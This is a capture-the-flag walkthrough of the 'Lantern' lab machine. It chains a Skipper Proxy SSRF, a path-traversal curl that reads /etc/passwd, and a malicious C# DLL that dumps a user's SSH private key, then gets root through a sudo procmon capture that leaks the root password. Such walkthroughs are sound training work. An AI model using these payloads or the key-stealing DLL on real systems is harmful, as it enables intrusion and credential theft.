Week 3. Lantern

TL;DR

This is an Ubuntu 22.04 machine hosting a web server on port 80. This is vulnerable to path traversal and also to SSRF, due to an installed version of Skipper Proxy (CVE-2022-38580). This can be exploited to find another internal web server on port 5000 made with ASP.NET Blazor. Abusing this server we are able to upload a malicious DLL that allows us to download a private key for a low-priv shell. Regarding esclation, we abuse a procmon binary that runs with sudo. This application uses BLOB storage in a SQLite database to record events that includes the root password.

KEYWORDS

Skipper Proxy, CVE-2022-38580, SSRF, path traversal, Blazor, dotpeek, reversing, C#, ASP.NET, procmon, SQLite, BLOB storage.

REFERENCES

https://www.cvedetails.com/cve/CVE-2022-38580/

https://www.exploit-db.com/exploits/51111

https://github.com/danielmiessler/SecLists/blob/master/Discovery/Infrastructure/common-http-ports.txt

https://es.wikipedia.org/wiki/Binary_large_object

ENUMERATION

Port scan.

> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-18 05:53 EDT
Nmap scan report for 10.10.11.29
Host is up, received user-set (0.040s latency).
Not shown: 64604 closed tcp ports (conn-refused), 928 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
3000/tcp open  ppp     syn-ack
 
Nmap done: 1 IP address (1 host up) scanned in 13.57 seconds

Enumerate the open ports.

> nmap $target -p22,80,3000 -sV -sC -Pn -vv -n
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-18 05:54 EDT
Nmap scan report for 10.10.11.29
Host is up, received user-set (0.039s latency).
Scanned at 2024-08-18 05:54:23 EDT for 97s
 
PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 80c947d589f85083025efe5330ac2d0e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGusUxyRLIhzLUjTy760PsP+hfg8+1NEQLQQfDeDRpoNyzq7OAGHksIqN1Mao6wZ7KRIU9FeeO4j3v1tygt+RgQ=
|   256 d422cffeb100cbeb6ddcb2b4646b9d89 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN9saUksNH519vji9ytatnGGy+QGBN+u+vur9+/YmVja
80/tcp   open  http    syn-ack Skipper Proxy
|_http-server-header: Skipper Proxy
| http-methods:
|_  Supported Methods: HEAD GET OPTIONS
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     Content-Length: 207
|     Content-Type: text/html; charset=utf-8
|     Date: Sun, 18 Aug 2024 09:54:57 GMT
|     Server: Skipper Proxy
|     <!doctype html>
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 302 Found
|     Content-Length: 225
|     Content-Type: text/html; charset=utf-8
|     Date: Sun, 18 Aug 2024 09:54:51 GMT
|     Location: http://lantern.htb/
|     Server: Skipper Proxy
|     <!doctype html>
|     <html lang=en>
|     <title>Redirecting...</title>
|     <h1>Redirecting...</h1>
|     <p>You should be redirected automatically to the target URL: <a href="http://lantern.htb/">http://lantern.htb/</a>. If not, click the link.
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Allow: HEAD, GET, OPTIONS
|     Content-Length: 0
|     Content-Type: text/html; charset=utf-8
|     Date: Sun, 18 Aug 2024 09:54:51 GMT
|_    Server: Skipper Proxy
|_http-title: Did not follow redirect to http://lantern.htb/
3000/tcp open  ppp?    syn-ack
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 500 Internal Server Error
|     Connection: close
|     Content-Type: text/plain; charset=utf-8
|     Date: Sun, 18 Aug 2024 09:54:56 GMT
|     Server: Kestrel
|     System.UriFormatException: Invalid URI: The hostname could not be parsed.
|     System.Uri.CreateThis(String uri, Boolean dontEscape, UriKind uriKind, UriCreationOptions& creationOptions)
|     System.Uri..ctor(String uriString, UriKind uriKind)
|     Microsoft.AspNetCore.Components.NavigationManager.set_BaseUri(String value)
|     Microsoft.AspNetCore.Components.NavigationManager.Initialize(String baseUri, String uri)
|     Microsoft.AspNetCore.Components.Server.Circuits.RemoteNavigationManager.Initialize(String baseUri, String uri)
|     Microsoft.AspNetCore.Mvc.ViewFeatures.StaticComponentRenderer.<InitializeStandardComponentServicesAsync>g__InitializeCore|5_0(HttpContext httpContext)
|     Microsoft.AspNetCore.Mvc.ViewFeatures.StaticC
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Content-Length: 0
|     Connection: close
|     Date: Sun, 18 Aug 2024 09:55:01 GMT
|     Server: Kestrel
|   Help:
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|     Date: Sun, 18 Aug 2024 09:54:56 GMT
|     Server: Kestrel
|   RTSPRequest:
|     HTTP/1.1 505 HTTP Version Not Supported
|     Content-Length: 0
|     Connection: close
|     Date: Sun, 18 Aug 2024 09:55:01 GMT
|     Server: Kestrel
|   SSLSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|     Date: Sun, 18 Aug 2024 09:55:17 GMT
|_    Server: Kestrel
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.93%I=7%D=8/18%Time=66C1C4D5%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,18F,"HTTP/1\.0\x20302\x20Found\r\nContent-Length:\x20225\r\nCont
SF:ent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Sun,\x2018\x20Aug\
SF:x202024\x2009:54:51\x20GMT\r\nLocation:\x20http://lantern\.htb/\r\nServ
SF:er:\x20Skipper\x20Proxy\r\n\r\n<!doctype\x20html>\n<html\x20lang=en>\n<
SF:title>Redirecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\x20
SF:should\x20be\x20redirected\x20automatically\x20to\x20the\x20target\x20U
SF:RL:\x20<a\x20href=\"http://lantern\.htb/\">http://lantern\.htb/</a>\.\x
SF:20If\x20not,\x20click\x20the\x20link\.\n")%r(HTTPOptions,A5,"HTTP/1\.0\
SF:x20200\x20OK\r\nAllow:\x20HEAD,\x20GET,\x20OPTIONS\r\nContent-Length:\x
SF:200\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Sun,\x2
SF:018\x20Aug\x202024\x2009:54:51\x20GMT\r\nServer:\x20Skipper\x20Proxy\r\
SF:n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent
SF:-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n4
SF:00\x20Bad\x20Request")%r(FourOhFourRequest,162,"HTTP/1\.0\x20404\x20Not
SF:\x20Found\r\nContent-Length:\x20207\r\nContent-Type:\x20text/html;\x20c
SF:harset=utf-8\r\nDate:\x20Sun,\x2018\x20Aug\x202024\x2009:54:57\x20GMT
SF:\nServer:\x20Skipper\x20Proxy\r\n\r\n<!doctype\x20html>\n<html\x20lang=
SF:en>\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\n<p>The\
SF:x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20server\.\x20
SF:If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20check\x20yo
SF:ur\x20spelling\x20and\x20try\x20again\.</p>\n")%r(GenericLines,67,"HTTP
SF:/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20chars
SF:et=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(Help,
SF:67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\
SF:x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")
SF:%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400\x20Bad\x2
SF:0Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection
SF::\x20close\r\n\r\n400\x20Bad\x20Request");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3000-TCP:V=7.93%I=7%D=8/18%Time=66C1C4DA%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,114E,"HTTP/1\.1\x20500\x20Internal\x20Server\x20Error\r\nConne
SF:ction:\x20close\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nDat
SF:e:\x20Sun,\x2018\x20Aug\x202024\x2009:54:56\x20GMT\r\nServer:\x20Kestre
SF:l\r\n\r\nSystem\.UriFormatException:\x20Invalid\x20URI:\x20The\x20hostn
SF:ame\x20could\x20not\x20be\x20parsed\.\n\x20\x20\x20at\x20System\.Uri\.C
SF:reateThis\(String\x20uri,\x20Boolean\x20dontEscape,\x20UriKind\x20uriKi
SF:nd,\x20UriCreationOptions&\x20creationOptions\)\n\x20\x20\x20at\x20Syst
SF:em\.Uri\.\.ctor\(String\x20uriString,\x20UriKind\x20uriKind\)\n\x20\x20
SF:\x20at\x20Microsoft\.AspNetCore\.Components\.NavigationManager\.set_Bas
SF:eUri\(String\x20value\)\n\x20\x20\x20at\x20Microsoft\.AspNetCore\.Compo
SF:nents\.NavigationManager\.Initialize\(String\x20baseUri,\x20String\x20u
SF:ri\)\n\x20\x20\x20at\x20Microsoft\.AspNetCore\.Components\.Server\.Circ
SF:uits\.RemoteNavigationManager\.Initialize\(String\x20baseUri,\x20String
SF:\x20uri\)\n\x20\x20\x20at\x20Microsoft\.AspNetCore\.Mvc\.ViewFeatures\.
SF:StaticComponentRenderer\.<InitializeStandardComponentServicesAsync>g__I
SF:nitializeCore\|5_0\(HttpContext\x20httpContext\)\n\x20\x20\x20at\x20Mic
SF:rosoft\.AspNetCore\.Mvc\.ViewFeatures\.StaticC")%r(Help,78,"HTTP/1\.1\x
SF:20400\x20Bad\x20Request\r\nContent-Length:\x200\r\nConnection:\x20close
SF:\r\nDate:\x20Sun,\x2018\x20Aug\x202024\x2009:54:56\x20GMT\r\nServer:\x2
SF:0Kestrel\r\n\r\n")%r(HTTPOptions,6F,"HTTP/1\.1\x20200\x20OK\r\nContent-
SF:Length:\x200\r\nConnection:\x20close\r\nDate:\x20Sun,\x2018\x20Aug\x202
SF:024\x2009:55:01\x20GMT\r\nServer:\x20Kestrel\r\n\r\n")%r(RTSPRequest,87
SF:,"HTTP/1\.1\x20505\x20HTTP\x20Version\x20Not\x20Supported\r\nContent-Le
SF:ngth:\x200\r\nConnection:\x20close\r\nDate:\x20Sun,\x2018\x20Aug\x20202
SF:4\x2009:55:01\x20GMT\r\nServer:\x20Kestrel\r\n\r\n")%r(SSLSessionReq,78
SF:,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x200\r\nConnect
SF:ion:\x20close\r\nDate:\x20Sun,\x2018\x20Aug\x202024\x2009:55:17\x20GMT\
SF:r\nServer:\x20Kestrel\r\n\r\n")%r(TerminalServerCookie,78,"HTTP/1\.1\x2
SF:0400\x20Bad\x20Request\r\nContent-Length:\x200\r\nConnection:\x20close\
SF:r\nDate:\x20Sun,\x2018\x20Aug\x202024\x2009:55:17\x20GMT\r\nServer:\x20
SF:Kestrel\r\n\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Nmap done: 1 IP address (1 host up) scanned in 98.01 seconds

We see something called "Skipper Proxy" on port 80. Update hosts file and inspect the site with Firefox.

If we search for Skipper Proxy vulnerabilities we find out it is vulnerable to SSRF (https://www.cvedetails.com/cve/CVE-2022-38580/), and there is this exploit available: https://www.exploit-db.com/exploits/51111

If we have a look at the exploit description, we just need to add the header X-Skipper-Proxy with the URL we want to query in our HTTP request.

Let's try it with a request to port 8080.

The application replies with code 503, so the vulnerability is confirmed.

On the other hand, we also see a login portal on port 3000.

If we inspect traffic with Burpsuite we find out it is made with Blazor.

It is an ASP.NET framework for building webs in C#. It is also an old acquaintance of ours since we have already exploited it in Week 12. Blazorized (Season 5).

USER

Leverage the SSRF to query the host for open web ports, something similar to what we did in Week 9. Editorial (Season 5). Just copy the HTTP request to a file and add the tag "FUZZ" in the port field.

GET / HTTP/1.1
Host: lantern.htb
X-Skipper-Proxy: http://127.0.0.1:FUZZ
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Download the list of common HTTP ports from here: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Infrastructure/common-http-ports.txt , and fuzz for open ports.

> ffuf -c -request request.http -request-proto http -t 100 -w ./common-http-ports.txt
 
        /'___\  /'___\           /'___\      
       /\ \__/ /\ \__/  __  __  /\ \__/      
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\     
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/     
         \ \_\   \ \_\  \ \____/  \ \_\      
          \/_/    \/_/   \/___/    \/_/      
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://lantern.htb/
 :: Wordlist         : FUZZ: /home/kali/htb/lantern/common-http-ports.txt
 :: Header           : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 :: Header           : Accept-Language: en-US,en;q=0.5
 :: Header           : Accept-Encoding: gzip, deflate, br
 :: Header           : Connection: keep-alive
 :: Header           : Upgrade-Insecure-Requests: 1
 :: Header           : Host: lantern.htb
 :: Header           : X-Skipper-Proxy: http://127.0.0.1:FUZZ
 :: Header           : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
 
5000                    [Status: 200, Size: 1669, Words: 389, Lines: 50, Duration: 68ms]
8000                    [Status: 200, Size: 12049, Words: 4549, Lines: 225, Duration: 52ms]
80                      [Status: 200, Size: 12049, Words: 4549, Lines: 225, Duration: 55ms]
3000                    [Status: 200, Size: 2852, Words: 334, Lines: 58, Duration: 311ms]
:: Progress: [36/36] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

We already know what is happening on ports 80 and 3000, let's check what is happening on port 5000.

It looks like the Blazor framework is running here. OK, we know the drill, first download the blazor.boot.json to check the loaded DLLs.

Most of them are system DLLs, but there is also a custom InternalLantern.dll

Let's download it with Burpsuite. For this, send a request to Repeater, right-click on it and select "Request in browser" so we can download the DLL in the browser leveraging the SSRF at the same time.

Copy and paste the link provided by Burpsuite in Firefox, the DLL is downloaded.

Decompile it with dotpeek, we find several base64 strings related to new employees.

Decode them to find several useful info.

> base64 -d base64
Head of sales department, emergency contact: +4412345678, email: john.s@example.comHR, emergency contact: +4412345678, email: anny.t@example.comFullStack developer, emergency contact: +4412345678, email: catherine.r@example.comPR, emergency contact: +4412345678, email: lara.s@example.comJunior .NET developer, emergency contact: +4412345678, email: lila.s@example.comSystem administrator, First day: 21/1/2024, Initial credentials admin:AJbFA_Q@925p9ap#22. Ask to change after first login!

Use the system administrator credentials to log in the admin portal running on port 3000.

In the "Files" section you have access to the web application Python source code app.py

from flask import Flask, render_template, send_file, request, redirect, json
from werkzeug.utils import secure_filename
import os
 
app=Flask("__name__")
 
@app.route('/')
def index():
    if request.headers['Host'] != "lantern.htb":
        return redirect("http://lantern.htb/", code=302)
    return render_template("index.html")
 
@app.route('/vacancies')
def vacancies():
    return render_template('vacancies.html')
 
@app.route('/submit', methods=['POST'])
def save_vacancy():
    name = request.form.get('name')
    email = request.form.get('email')
    vacancy = request.form.get('vacancy', default='Middle Frontend Developer')
 
    if 'resume' in request.files:
        try:
            file = request.files['resume']
            resume_name = file.filename
            if resume_name.endswith('.pdf') or resume_name == '':
                filename = secure_filename(f"resume-{name}-{vacancy}-latern.pdf")
                upload_folder = os.path.join(os.getcwd(), 'uploads')
                destination = '/'.join([upload_folder, filename])
                file.save(destination)
            else:
                return "Only PDF files allowed!"
        except:
            return "Something went wrong!"
    return "Thank you! We will conact you very soon!"
 
@app.route('/PrivacyAndPolicy')
def sendPolicyAgreement():
    lang = request.args.get('lang')
    file_ext = request.args.get('ext')
    try:
            return send_file(f'/var/www/sites/localisation/{lang}.{file_ext}')
    except:
            return send_file(f'/var/www/sites/localisation/default/policy.pdf', 'application/pdf')
 
if __name__ == '__main__':
    app.run(host='127.0.0.1', port=8000)
# which contains a path traversal vulnerability in this function
@app.route('/PrivacyAndPolicy')
def sendPolicyAgreement():
    lang = request.args.get('lang')
    file_ext = request.args.get('ext')
    try:
            return send_file(f'/var/www/sites/localisation/{lang}.{file_ext}')
    except:
            return send_file(f'/var/www/sites/localisation/default/policy.pdf', 'application/pdf')

There is a path traversal vulnerability in the sendPolicyAgreement() function. In the endpoint /PrivacyAndPolicy the application takes parameters lang and ext without sanitization, then concatenates them with a dot in between to form a file path.

A way to verify vulnerability with curl would be the following.

> curl 'http://lantern.htb/PrivacyAndPolicy?lang=../../../../../../../../.&ext=/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www/sites:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
tomas:x:1000:1000:tomas:/home/tomas:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
_laurel:x:998:998::/var/log/laurel:/bin/false

We take note of the username tomas as it is the only with a shell assigned in the /etc/passwd file (apart from root).

A way to log in as user tomas would be to find his private key in the file system. However, the web server on port 80 is running under www-data context and we cannot exploit the path traversal to dump the private key.

The Blazor web server running on port 3000 could be running under tomas context but this one is not vulnerable to path traversal. Therefore, we have to find another vulnerability in the web server running on port 3000.

Notice that in the admin dashboard, when we choose an unknown module, the application outputs the path where modules are loaded.

If we could upload a malicious DLL in /opt/components/ maybe we could read the private key.

Let's prepare a C# snippet read the private key in the file system. First, create a new .NET class library project named MyFileReaderLibrary

> dotnet new classlib -n MyFileReaderLibrary

Move to that directory and edit the Class1.cs file. Add the following code in C# to dump the id_rsa private key.

using System;
using System.IO;
using Microsoft.AspNetCore.Components;
using Microsoft.AspNetCore.Components.Rendering;
 
namespace MyFileReaderLibrary
{
    public class FileReader
    {
        public string ReadFile(string filePath)
        {
            try
            {
                if (File.Exists(filePath))
                {
                    return File.ReadAllText(filePath);
                }
                else
                {
                    throw new FileNotFoundException("File not found.", filePath);
                }
            }
            catch (Exception ex)
            {
                // Handle exceptions (e.g., log them)
                throw new ApplicationException("An error occurred while reading the file.", ex);
            }
        }
    }
 
    public class Component : ComponentBase
    {
        protected string FileContent { get; set; }
 
        protected override void OnInitialized()
        {
            var fileReader = new FileReader();
            FileContent = fileReader.ReadFile("/home/tomas/.ssh/id_rsa");
        }
 
        protected override void BuildRenderTree(RenderTreeBuilder builder)
        {
            base.BuildRenderTree(builder);
            builder.OpenElement(0, "div");
            builder.AddContent(1, FileContent);
            builder.CloseElement();
        }
    }
}

Add the package to provide the core Blazor components.

> dotnet add package Microsoft.AspNetCore.Components --version 6.0.0
Determining projects to restore...
Writing /tmp/tmp1A1u2q.tmp
info : X.509 certificate chain validation will use the fallback certificate bundle at '/usr/share/dotnet/sdk/6.0.402/trustedroots/codesignctl.pem'.
info : Adding PackageReference for package 'Microsoft.AspNetCore.Components' into project '/home/kali/htb/lantern/MyFileReaderLibrary/MyFileReaderLibrary.csproj'.
info : Restoring packages for /home/kali/htb/lantern/MyFileReaderLibrary/MyFileReaderLibrary.csproj...
info : Package 'Microsoft.AspNetCore.Components' is compatible with all the specified frameworks in project '/home/kali/htb/lantern/MyFileReaderLibrary/MyFileReaderLibrary.csproj'.
info : PackageReference for package 'Microsoft.AspNetCore.Components' version '6.0.0' added to file '/home/kali/htb/lantern/MyFileReaderLibrary/MyFileReaderLibrary.csproj'.
info : Generating MSBuild file /home/kali/htb/lantern/MyFileReaderLibrary/obj/MyFileReaderLibrary.csproj.nuget.g.targets.
info : Writing assets file to disk. Path: /home/kali/htb/lantern/MyFileReaderLibrary/obj/project.assets.json
log  : Restored /home/kali/htb/lantern/MyFileReaderLibrary/MyFileReaderLibrary.csproj (in 181 ms)

Finally, build the project.

> dotnet build -c Release
MSBuild version 17.3.2+561848881 for .NET
  Determining projects to restore...
  All projects are up-to-date for restore.
MyFileReaderLibrary/Class1.cs(33,26): warning CS8618: Non-nullable property 'FileContent' must contain a non-null value when exiting constructor. Consider declaring the property as nullable. [MyFileReaderLibrary/MyFileReaderLibrary.csproj]    
  MyFileReaderLibrary -> MyFileReaderLibrary/bin/Release/net6.0/MyFileReaderLibrary.dll                                  
 
Build succeeded.                                                                                                                                
                                                                                                                                                 
MyFileReaderLibrary/Class1.cs(33,26): warning CS8618: Non-nullable property 'FileContent' must contain a non-null value when exiting constructor. Consider declaring the property as nullable. [MyFileReaderLibrary/MyFileReaderLibrary.csproj]    
    1 Warning(s)                                                                                                                                 
    0 Error(s)                                                                                                                                  
 
Time Elapsed 00:00:01.83

The MyFileReaderLibrary.dll library is generated in bin/Release/net6.0

To upload it, click on "Upload content", and intercept the request. You have to modify the upload path to be opt/components/MyFileReaderLibrary.dll. Unfortunately, this cannot be done manually since the Blazor applications uses binary serialized data, and you need a Burpsuite extension called BTP to serialize the data we need to modify the HTTP requests.

Install the extension and send the intercepted request to BTP.

Here you just need to deserialize the binary Blazor data (Blazor -> JSON) and modify the path as needed.

Then copy the resulting JSON into the left part and serialize it again (JSON -> Blazor).

The resulting binary payload is what you have to insert in the intercepted HTTP request, then forward it.

The DLL is successfully uploaded.

Then choose module MyFileReaderLibrary, the DLL is execute and the private key is dumped.

Use it to get an SSH session in the host as user tomas

And get the user flag.

ROOT

Start from the low-priv shell as user tomas and take the opportunity to enumerate e user and the system.

> whoami && id
tomas
uid=1000(tomas) gid=1000(tomas) groups=1000(tomas)
 
> uname -a && cat /etc/os-release
Linux lantern 5.15.0-118-generic #128-Ubuntu SMP Fri Jul 5 09:28:59 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
PRETTY_NAME="Ubuntu 22.04.4 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.4 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy

The welcome message says we have mail so let's have a look at it.

> cat /var/mail/tomas
From hr@lantern.htb Mon Jan 1 12:00:00 2023
Subject: Welcome to Lantern!
 
Hi Tomas,
 
Congratulations on joining the Lantern team as a Linux Engineer! We're thrilled to have you on board.
 
While we're setting up your new account, feel free to use the access and toolset of our previous team member. Soon, you'll have all the access you need.
 
Our admin is currently automating processes on the server. Before global testing, could you check out his work in /root/automation.sh? Your insights will be valuable.
 
Exciting times ahead!
 
Best.

And the sudo configuration.

> sudo -l
Matching Defaults entries for tomas on lantern:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
 
User tomas may run the following commands on lantern:
    (ALL : ALL) NOPASSWD: /usr/bin/procmon

Check what this procmon binary is about.

> sudo procmon --help
procmon [OPTIONS...]
   OPTIONS
      -h/--help                Prints this help screen
      -p/--pids                Comma separated list of process ids to monitor
      -e/--events              Comma separated list of system calls to monitor
      -c/--collect [FILEPATH]  Option to start Procmon in a headless mode
      -f/--file FILEPATH       Open a Procmon trace file

This suggests a process monitoring tool where we can specify which events we are interested in with the -e flag. In other words, which system calls or events we want to monitor.

Check automation.sh PID and register its write events with procmon

> ps -ef
[...]
root        1646    1645  0 18:10 pts/0    00:00:00 nano /root/automation.sh

> sudo procmon -p <pid> -e write

Give it some time to capture events and then press F6 to export the data and F9 to exit. Then transfer the procmon_xxx.db export to Kali.

It is an SQLite database, inspect it with client.

> sqlite3
SQLite version 3.39.3 2022-09-05 11:02:23
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.

sqlite> .open procmon_2024-10-13_18:41:41.db

sqlite> .tables
ebpf      metadata  stats  

sqlite> PRAGMA table_info(ebpf);
0|pid|INT|0||0
1|stacktrace|TEXT|0||0
2|comm|TEXT|0||0
3|processname|TEXT|0||0
4|resultcode|INTEGER|0||0
5|timestamp|INTEGER|0||0
6|syscall|TEXT|0||0
7|duration|INTEGER|0||0
8|arguments|BLOB|0||0

sqlite> select * from ebpf;
2114|139856737245319$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|6|3086839809110|write|13486|
2114|139856737245319$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|0|3086839809110|write|32832|
2114|139856737245319$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|0|3086839809110|write|98986|
2114|139856737245319$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|0|3086839809110|write|106500|
2114|139856737245319$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|0|3086839809110|write|114004|
2114|139856737245319$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|0|3086839809110|write|120126|
2114|139856737245319$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|6|3086839936159|write|5700|
2114|139856737245319$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|0|3086839936159|write|12393|
2114|139856737245319$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|0|3086839936159|write|18044|
2114|139856737245319$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|0|3086839936159|write|24746|
2114|139856737245319$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|1|3086839968750|write|4298|
2114|139856737245319$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|0|3086839968750|write|9538|
2114|139856737245319$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|1|3086839968750|write|1000165744|

We see BLOB binary data is saved in the 8th column (https://es.wikipedia.org/wiki/Binary_large_object). If we visually inspect the database, we see interesting stuff is always written in the blob when resultcode is 1 or 6. And it is always written starting from the 9th byte in the BLOB.

So let's export the BLOBs in HEX format to have a closer look.

sqlite> .out blobs.txt
sqlite> SELECT hex(substr(arguments, 9, resultcode)) FROM ebpf WHERE resultcode > 0;
sqlite> .exit

Convert from HEX into readable format.

> cat blobs.txt | xxd -r -p > output

And read the output.

> cat output
[...]
echo Q 33EEddddttddww33ppMMBB |

Just su to root and grab the flag.

You are root.